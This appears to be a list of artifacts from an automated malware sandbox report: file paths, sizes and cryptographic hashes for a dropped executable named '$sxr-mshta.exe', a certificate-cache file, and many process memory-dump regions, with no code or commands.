Download Submit
C:\Windows\$sxr-mshta.exe
Filesize
32KB

MD5
356e04e106f6987a19938df67dea0b76

SHA1
f2fd7cde5f97427e497dfb07b7f682149dc896fb

SHA256
4ed8a115fa1dcfd532397b800775c1b54d2d407b52118b5423e94ff1ce855d7e

SHA512
df1c655fa3a95e001084af8c3aa97c54dbcb690210e1353dd836702cfb4af3c857449df62aa62d7ab525ffb4e0dc1552181dfcdee2c28f4af5c20df6d95811cd

Download Submit
C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04
Filesize
412B

MD5
45a80505f42379c1c9515dbe048e2633

SHA1
070d78651bed3deab9c80048a7ff6869a8b9b986

SHA256
cace9cb72a714cce6f7f50ab410fbd5cc11f06d0702a6ceb4157d619e3e2fac1

SHA512
9b9197c3e5bd240d370b31d622328baa5ca8d2edab573e119c19e67b9d3ead7a3c26cd901b036538a74015b522435e95743943801a63b26caee1e3837901c8a1

Download Submit
memory/460-108-0x000002667FCF0000-0x000002667FD17000-memory.dmp

Filesize
156KB

Download
memory/460-110-0x00007FFEF5250000-0x00007FFEF5260000-memory.dmp

Filesize
64KB

Download
memory/632-107-0x00007FFEF5250000-0x00007FFEF5260000-memory.dmp

Filesize
64KB

Download
memory/632-101-0x000001F76A7D0000-0x000001F76A7F2000-memory.dmp

Filesize
136KB

Download
memory/632-102-0x000001F76AA50000-0x000001F76AA77000-memory.dmp

Filesize
156KB

Download
memory/688-112-0x00007FFEF5250000-0x00007FFEF5260000-memory.dmp

Filesize
64KB

Download
memory/688-104-0x000001D0BB9C0000-0x000001D0BB9E7000-memory.dmp

Filesize
156KB

Download
memory/720-119-0x00007FFEF5250000-0x00007FFEF5260000-memory.dmp

Filesize
64KB

Download
memory/720-118-0x000001571DB70000-0x000001571DB97000-memory.dmp

Filesize
156KB

Download
memory/996-115-0x00007FFEF5250000-0x00007FFEF5260000-memory.dmp

Filesize
64KB

Download
memory/996-114-0x000001D714AB0000-0x000001D714AD7000-memory.dmp

Filesize
156KB

Download
memory/1036-122-0x000002A371EA0000-0x000002A371EC7000-memory.dmp

Filesize
156KB

Download
memory/1036-123-0x00007FFEF5250000-0x00007FFEF5260000-memory.dmp

Filesize
64KB

Download
memory/1044-126-0x000001BAF97D0000-0x000001BAF97F7000-memory.dmp

Filesize
156KB

Download
memory/1044-127-0x00007FFEF5250000-0x00007FFEF5260000-memory.dmp

Filesize
64KB

Download
memory/1100-135-0x0000021B26690000-0x0000021B266B7000-memory.dmp

Filesize
156KB

Download
memory/1100-136-0x00007FFEF5250000-0x00007FFEF5260000-memory.dmp

Filesize
64KB

Download
memory/1160-138-0x000002044A2E0000-0x000002044A307000-memory.dmp

Filesize
156KB

Download
memory/1360-80-0x00000224BA120000-0x00000224BA2E2000-memory.dmp

Filesize
1.8MB

Download
memory/1360-78-0x00000224B9D80000-0x00000224B9DD0000-memory.dmp

Filesize
320KB

Download
memory/1360-64-0x00000224C1D30000-0x00000224C24FA000-memory.dmp

Filesize
7.8MB

Download
memory/1360-65-0x00000224C2500000-0x00000224C293E000-memory.dmp

Filesize
4.2MB

Download
memory/1360-66-0x00000224C2940000-0x00000224C29F2000-memory.dmp

Filesize
712KB

Download
memory/1360-67-0x00000224B9160000-0x00000224B9182000-memory.dmp

Filesize
136KB

Download
memory/1360-68-0x00007FFF351C0000-0x00007FFF353C9000-memory.dmp

Filesize
2.0MB

Download
memory/1360-417-0x00000224BAE70000-0x00000224BB398000-memory.dmp

Filesize
5.2MB

Download
memory/1360-93-0x00007FFF345E0000-0x00007FFF3469D000-memory.dmp

Filesize
756KB

Download
memory/1360-61-0x00007FFF351C0000-0x00007FFF353C9000-memory.dmp

Filesize
2.0MB

Download
memory/1360-79-0x00000224B9E90000-0x00000224B9F42000-memory.dmp

Filesize
712KB

Download
memory/1360-62-0x00007FFF345E0000-0x00007FFF3469D000-memory.dmp

Filesize
756KB

Download
memory/1360-63-0x00000224B93A0000-0x00000224B9924000-memory.dmp

Filesize
5.5MB

Download
memory/1360-90-0x00000224B9DD0000-0x00000224B9E0C000-memory.dmp

Filesize
240KB

Download
memory/1360-91-0x00000224B9D30000-0x00000224B9D7E000-memory.dmp

Filesize
312KB

Download
memory/1360-92-0x00007FFF351C0000-0x00007FFF353C9000-memory.dmp

Filesize
2.0MB

Download
memory/1360-94-0x00000224B9E10000-0x00000224B9E46000-memory.dmp

Filesize
216KB

Download
memory/2452-33-0x0000000000400000-0x0000000000406000-memory.dmp

Filesize
24KB

Download
memory/2452-37-0x0000000000400000-0x0000000000406000-memory.dmp

Filesize
24KB

Download
memory/2604-35-0x0000000140000000-0x0000000140004000-memory.dmp

Filesize
16KB

Download
memory/2604-32-0x0000000140000000-0x0000000140004000-memory.dmp

Filesize
16KB

Download
memory/2624-25-0x000001E0BFAB0000-0x000001E0BFB56000-memory.dmp

Filesize
664KB

Download
memory/2624-39-0x00007FFF12E10000-0x00007FFF138D2000-memory.dmp

Filesize
10.8MB

Download
memory/2624-22-0x00007FFF12E10000-0x00007FFF138D2000-memory.dmp

Filesize
10.8MB

Download
memory/2624-38-0x00007FFF12E10000-0x00007FFF138D2000-memory.dmp

Filesize
10.8MB

Download
memory/2624-23-0x000001E0BF060000-0x000001E0BFAB0000-memory.dmp

Filesize
10.3MB

Download
memory/2624-89-0x00007FFF12E10000-0x00007FFF138D2000-memory.dmp

Filesize
10.8MB

Download
memory/2624-26-0x000001E0BECF0000-0x000001E0BED46000-memory.dmp

Filesize
344KB

Download
memory/2624-28-0x000001E0A66C0000-0x000001E0A66E2000-memory.dmp

Filesize
136KB

Download
memory/2624-29-0x00007FFF351C0000-0x00007FFF353C9000-memory.dmp

Filesize
2.0MB

Download
memory/2624-75-0x00007FFF12E10000-0x00007FFF138D2000-memory.dmp

Filesize
10.8MB

Download
memory/2624-1385-0x00007FFF12E10000-0x00007FFF138D2000-memory.dmp

Filesize
10.8MB

Download
memory/2624-31-0x000001E0BE9B0000-0x000001E0BE9BA000-memory.dmp

Filesize
40KB

Download
memory/2624-27-0x000001E0BFB60000-0x000001E0BFBB8000-memory.dmp

Filesize
352KB

Download
memory/2624-13-0x00007FFF12E10000-0x00007FFF138D2000-memory.dmp

Filesize
10.8MB

Download
memory/2624-4-0x00007FFF12E13000-0x00007FFF12E15000-memory.dmp

Filesize
8KB

Download
memory/2624-15-0x00007FFF12E10000-0x00007FFF138D2000-memory.dmp

Filesize
10.8MB

Download
memory/2624-21-0x00007FFF12E10000-0x00007FFF138D2000-memory.dmp

Filesize
10.8MB

Download
memory/2624-20-0x00007FFF12E10000-0x00007FFF138D2000-memory.dmp

Filesize
10.8MB

Download
memory/2624-19-0x00007FFF345E0000-0x00007FFF3469D000-memory.dmp

Filesize
756KB

Download
memory/2624-14-0x000001E0BEA40000-0x000001E0BEA62000-memory.dmp

Filesize
136KB

Download
memory/2624-74-0x00007FFF12E13000-0x00007FFF12E15000-memory.dmp

Filesize
8KB

Download
memory/2624-419-0x000001E0C0050000-0x000001E0C0072000-memory.dmp

Filesize
136KB

Download
memory/2624-18-0x00007FFF351C0000-0x00007FFF353C9000-memory.dmp

Filesize
2.0MB

Download
memory/2624-17-0x000001E0A6690000-0x000001E0A66B4000-memory.dmp

Filesize
144KB

Download
memory/2624-16-0x00007FFF12E10000-0x00007FFF138D2000-memory.dmp

Filesize
10.8MB

Download
memory/3552-99-0x0000000140000000-0x0000000140028000-memory.dmp

Filesize
160KB

Download
memory/3552-98-0x00007FFF345E0000-0x00007FFF3469D000-memory.dmp

Filesize
756KB

Download
memory/3552-97-0x00007FFF351C0000-0x00007FFF353C9000-memory.dmp

Filesize
2.0MB

Download
memory/3552-96-0x0000000140000000-0x0000000140028000-memory.dmp

Filesize
160KB

Download
memory/3552-95-0x0000000140000000-0x0000000140028000-memory.dmp

Filesize
160KB

Download